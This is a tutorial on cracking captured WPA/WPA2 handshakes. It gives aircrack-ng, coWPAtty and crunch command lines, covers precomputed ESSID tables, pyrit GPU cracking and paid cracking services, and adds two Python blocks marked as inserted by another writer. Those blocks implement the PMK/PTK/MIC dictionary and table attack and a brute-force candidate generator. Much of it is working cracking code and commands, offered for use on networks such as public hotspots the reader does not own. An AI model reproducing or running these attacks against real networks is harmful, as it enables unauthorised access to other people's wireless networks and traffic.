Tutorial - Cracking WPA/WPA2 (Part 2) - Any OS - Tools included

This is Part 2 of my guide on cracking WPA handshakes; I had to split it into two parts as it was too long! You can find the first part here.

This is also a good summary of the methods available to us!



Cracking
Now that you have your handshake you need to crack it. This is a very popular subject in wireless hacking, as there are a few ways to go about it, all with varying opinions.

Dictionary attack
This is the standard method of cracking and is very easy and simple: each word in the list is tried as the passphrase until one reproduces the MIC in the captured handshake.

For this we use: 

Code 
aircrack-ng <filename-01.cap> -w <file path of wordlist>

So for my example I would use:

Code 
aircrack-ng WPA-01.cap -w Pass/Example

For my example I made a wordlist that consisted only of my wireless key, so the result was instant; however, when doing this in the real world it will take you many hours or even days to run through a decent wordlist.

When using a live CD/USB stick to boot BT4, save your wordlist to your desktop and use

Code 
-w <wordlist>

However the problem with this method is that it will take a VERY long time to go through a word list of any decent size. In my example I was only going through 350 keys a second; that may seem fast, but a 1GB word list contains about 100 million words, so at that rate it would take about 80 hours (over three days) to exhaust. The bottleneck is not reading the file or comparing strings: each candidate has to be run through 4,096 rounds of PBKDF2-HMAC-SHA1 to turn it into a PMK before it can be tested against the handshake, and that is where almost all the time goes.

An alternative bit of software with more features, including the use of precomputed hash tables (the "rainbow" tables covered below), is coWPAtty. It uses the same dictionary method, a tad faster. It is included in BackTrack, so open it up and have a look at what it can do.

Here's some example syntax for cracking a 4-way handshake:

Code 
cowpatty -f <word list> -r <handshake>.cap -s <essid>

"Rainbow" tables
Now this is an interesting method that a lot of people have misunderstood. The idea is that if you had a table of words whose WPA keys had all been precomputed, you could go through them a lot faster. That is true: you can go through a precomputed table at say 40,000 keys a second compared to 350 keys a second in the prior example. However the slow part of testing a WPA candidate is turning the passphrase into the PMK (4,096 rounds of PBKDF2-HMAC-SHA1), and that step is salted with the ESSID of the network. This means a table generated for "johns network" will not work for "Erics network": the ESSID is different, so the salt is different and every precomputed key in the table is wrong for the new handshake. (Strictly these are plain lookup tables of precomputed PMKs rather than true rainbow tables, but everyone calls them rainbow tables.)

That means a new table has to be produced for every different ESSID. It is like multiplication tables: everything has been worked out beforehand. Now this is where a few people get confused....

It is possible to create your own tables for networks with unique ESSIDs, however the rate at which you create them (the speed at which you precompute keys for the table) is exactly the same as the rate at which keys can be tested against a word list, because the PBKDF2 step is the whole cost either way. So for me it was 350 keys a second being added to the table. You can then go through the table at a very fast rate; I was able to go at 40,000 keys a second after I had generated it. But the key point is that the time it took to generate the table could have been used to just go through the word list! So creating your own table for a unique ESSID is ridiculous, unless you expect to attack handshakes from that same ESSID again and again, in which case the precomputation is paid once and reused.

However the idea behind these tables is that someone with a large amount of computing power could generate tables for a list of popular ESSIDs and then make them available for download. So you capture a handshake from "WirelessHotspot", check the list of rainbow tables, see that "WirelessHotspot" has one, download it and then run through the word list at an accelerated rate. And believe it or not, someone has done this!

In this thread you can see links to all of the tables for the most popular ESSIDs. If the network you are trying to crack has an ESSID in the list, you can download the table and run through it at great speed!

I will not cover the commands and screenshots for this, as I have no need for the method and there are no wireless networks with an ESSID in the list for me to crack; so you will have to google it yourself. It shouldn't be hard!
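To make the last two sections concrete, here is an added worked example in Python. It is not code from the original post and not aircrack-ng's, coWPAtty's or pyrit's own code; it implements the same maths those tools use (PBKDF2 to get the PMK, PRF-512 to get the PTK, HMAC over the EAPOL frame for the MIC) and runs a dictionary attack and a precomputed-table attack against a constructed handshake. The handshake, MAC addresses, nonces, EAPOL body and wordlist are all made up here for the demonstration; only the derivation functions are real. Run it and compare the timings: building the table for an ESSID costs the same as the dictionary attack, the table attack on the same ESSID is then nearly free, and the same table finds nothing on a network with a different ESSID.

```python
import hashlib
import hmac
import time


def pmk(passphrase, essid):
    """Slow step: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes, salted with the ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter, truncated to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def kck(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """Cheap step: PMK -> PTK; the first 16 bytes (KCK) are what signs the EAPOL frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_bytes, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck_bytes, eapol_zeroed, key_version):
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 (WPA/TKIP) or HMAC-SHA1[:16] (WPA2/CCMP)."""
    if key_version == 1:
        return hmac.new(kck_bytes, eapol_zeroed, hashlib.md5).digest()
    return hmac.new(kck_bytes, eapol_zeroed, hashlib.sha1).digest()[:16]


def mic_matches(pmk_bytes, hs):
    """Does this PMK reproduce the MIC the client sent in message 2 of the handshake?"""
    k = kck(pmk_bytes, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(k, hs["eapol"], hs["key_version"]), hs["mic"])


def make_handshake(passphrase, essid, key_version=2):
    """Constructed sample handshake (not a real capture): fixed MACs, nonces derived from the ESSID,
    and a placeholder EAPOL-Key body whose MIC field is already zeroed."""
    hs = {
        "essid": essid,
        "ap_mac": bytes.fromhex("00112233aabb"),
        "sta_mac": bytes.fromhex("001122ccddee"),
        "anonce": hashlib.sha256(b"anonce:" + essid.encode()).digest(),
        "snonce": hashlib.sha256(b"snonce:" + essid.encode()).digest(),
        "eapol": b"\x01\x03\x00\x5f\x02" + bytes(94),
        "key_version": key_version,
    }
    k = kck(pmk(passphrase, essid), hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(k, hs["eapol"], key_version)
    return hs


def dictionary_attack(hs, wordlist):
    """What aircrack-ng -w does: one PBKDF2 per candidate, then the cheap MIC check."""
    for word in wordlist:
        if mic_matches(pmk(word, hs["essid"]), hs):
            return word
    return None


def build_pmk_table(essid, wordlist):
    """What genpmk/pyrit do: precompute (candidate, PMK) for ONE ESSID. Exactly the work dictionary_attack does."""
    return [(word, pmk(word, essid)) for word in wordlist]


def table_attack(hs, table):
    """Only the cheap PTK/MIC step per candidate; useless if the table was built for another ESSID."""
    for word, pmk_bytes in table:
        if mic_matches(pmk_bytes, hs):
            return word
    return None


WORDLIST = [f"password{n}" for n in range(200)] + ["letmein2010"]  # constructed list, the key is last


if __name__ == "__main__":
    johns = make_handshake("letmein2010", "johns network")
    erics = make_handshake("letmein2010", "Erics network")

    t0 = time.perf_counter()
    print("dictionary attack on johns:", dictionary_attack(johns, WORDLIST), f"{time.perf_counter() - t0:.2f}s")

    t0 = time.perf_counter()
    table = build_pmk_table("johns network", WORDLIST)
    print("building table for 'johns network':", f"{time.perf_counter() - t0:.2f}s (same work as above)")

    t0 = time.perf_counter()
    print("table attack on johns:", table_attack(johns, table), f"{time.perf_counter() - t0:.4f}s")
    print("same table against Erics network:", table_attack(erics, table), "(different ESSID = different salt)")
```

A sanity check for the PMK function is the IEEE 802.11i test vector: passphrase "password" with SSID "IEEE" gives the PMK f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e. With a real capture you would read the MACs, nonces and EAPOL frame out of the .cap file and zero the 16-byte MIC field before hashing; the rest of the logic is identical.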

Accelerated word list with pyrit
Now this is the method I believe is the best, however it does require a decent graphics card! This method uses the GPU (Graphics Processing Unit) on your graphics card to do the expensive part of each test, the PBKDF2 step that turns a candidate into a PMK, for thousands of candidates in parallel. This is the method I use as it makes the most sense to me, and I have a good graphics card! It still requires a word list to work, but it lets you go through the word list A LOT faster than before. Here you can see that on my new system I am going at 5,480 keys a second with the standard aircrack-ng dictionary attack:



Now when I use pyrit and my GPU I can get up to 56,000 keys a second!:

That makes a big difference! Again I won't show you how to do all this, as it is quite complex to set up and there are already a few guides out there. Look here for more info.

Online services
There are services online that use various techniques to crack WPA keys, although they do charge money! The best site is most likely www.recoverwpa.com, as they do not charge an upfront deposit; you only pay if they find your key. However, I believe this and a few other websites are doing nothing more than what I would do; I recall one website that charged $10 for under 1 billion words in 2 hours, something I can do myself in about 6 hours at the GPU rate above! So that option is there if you don't have the hardware or the time but do have the money. This is also a good test if you are a white hat, as the black hats could well use a similar or the same service. I recommend you google around looking for the best service, or maybe even ask me!

Bruteforcing
Now here is another method that is a tad ridiculous for the general case: you pipe the output of a program called crunch directly into a WPA cracker like aircrack-ng or pyrit. crunch generates the wordlist on the fly as the cracker consumes it, and you define the character set and lengths it should cover. So if you used:

Code 
crunch 8 10 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!?-_' | aircrack-ng -w - -e <essid> <handshake>.cap

With crunch and aircrack-ng you would be generating every 8- to 10-character combination of those 66 characters. A friend and I originally worked this out to be something like 84 petabytes, but that is a big underestimate: the keyspace is 66^8 + 66^9 + 66^10, roughly 1.6 × 10^18 candidates, which written out as a wordlist (each candidate plus a newline) comes to about 17 exabytes. At 56,000 keys a second that is on the order of 900,000 years. So not only is storing it impractical, exhausting it is impossible even with a high-end setup.

The only legitimate use for crunch in WPA cracking that I can see is when you already know the structure of the key: it is only numeric, or it is a certain length and contains only certain characters. That cuts the number of words generated down massively. For example, 8 characters from 0-9 is only 10^8 = 100 million candidates: about 3 days at 350 keys a second, about 5 hours at 5,480, and about half an hour at 56,000. That is very plausible, but only if you know the key is exactly 8 characters long and only numeric.
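As an added example (not part of the original post, and not crunch's own code), the following Python reproduces what crunch does with a charset and a length range, and works out the numbers that decide whether brute force is even worth starting: keyspace size, wordlist size on disk, and worst-case time at the three cracking rates quoted on this page (350, 5,480 and 56,000 keys a second). The charset is the 66-symbol one from the text; the rates are the page's own figures; everything else is arithmetic.

```python
import itertools

CRUNCH_CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!?-_"  # 66 characters, from the text
DIGITS = "0123456789"

SECONDS_PER_YEAR = 365.25 * 86400
RATES = (350, 5480, 56000)  # keys/s: aircrack-ng on the old box, on the new box, pyrit on the GPU


def keyspace(charset, min_len, max_len):
    """How many candidates crunch emits for lengths min_len..max_len over charset."""
    n = len(charset)
    return sum(n ** length for length in range(min_len, max_len + 1))


def wordlist_bytes(charset, min_len, max_len):
    """Disk size of the same list: every candidate plus its newline."""
    n = len(charset)
    return sum(n ** length * (length + 1) for length in range(min_len, max_len + 1))


def exhaust_seconds(charset, min_len, max_len, keys_per_second):
    """Worst-case time to test the whole keyspace at a given cracking rate."""
    return keyspace(charset, min_len, max_len) / keys_per_second


def candidates(charset, min_len, max_len):
    """The stream crunch pipes into the cracker: shortest length first, charset order, never stored on disk."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def human_bytes(n):
    """Decimal units, three significant figures (e.g. 900 MB, 17.5 EB)."""
    for unit in ("B", "KB", "MB", "GB", "TB", "PB", "EB"):
        if n < 1000 or unit == "EB":
            return f"{n:.3g} {unit}"
        n /= 1000


def describe(charset, min_len, max_len, rates=RATES):
    """Feasibility summary for a crunch charset/length choice."""
    n = keyspace(charset, min_len, max_len)
    lines = [f"{len(charset)} chars, length {min_len}-{max_len}: {n:.3g} candidates, "
             f"{human_bytes(wordlist_bytes(charset, min_len, max_len))} on disk"]
    for rate in rates:
        secs = exhaust_seconds(charset, min_len, max_len, rate)
        if secs < SECONDS_PER_YEAR / 10:
            lines.append(f"  at {rate:>6} keys/s: {secs / 3600:.1f} hours")
        else:
            lines.append(f"  at {rate:>6} keys/s: {secs / SECONDS_PER_YEAR:.3g} years")
    return "\n".join(lines)


if __name__ == "__main__":
    print(describe(CRUNCH_CHARSET, 8, 10))  # the 8-10 character, 66-symbol space from the text
    print(describe(DIGITS, 8, 8))           # the realistic case: key known to be exactly 8 digits
    print(list(itertools.islice(candidates(DIGITS, 8, 8), 3)))  # first candidates crunch would emit
```

The generator is the part worth keeping: if you know a key's structure (say, 10 digits, or 8 lowercase letters) you can feed `candidates(...)` straight into a cracker the way crunch is piped into aircrack-ng above, and `describe(...)` tells you beforehand whether the run will finish in minutes or in centuries.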
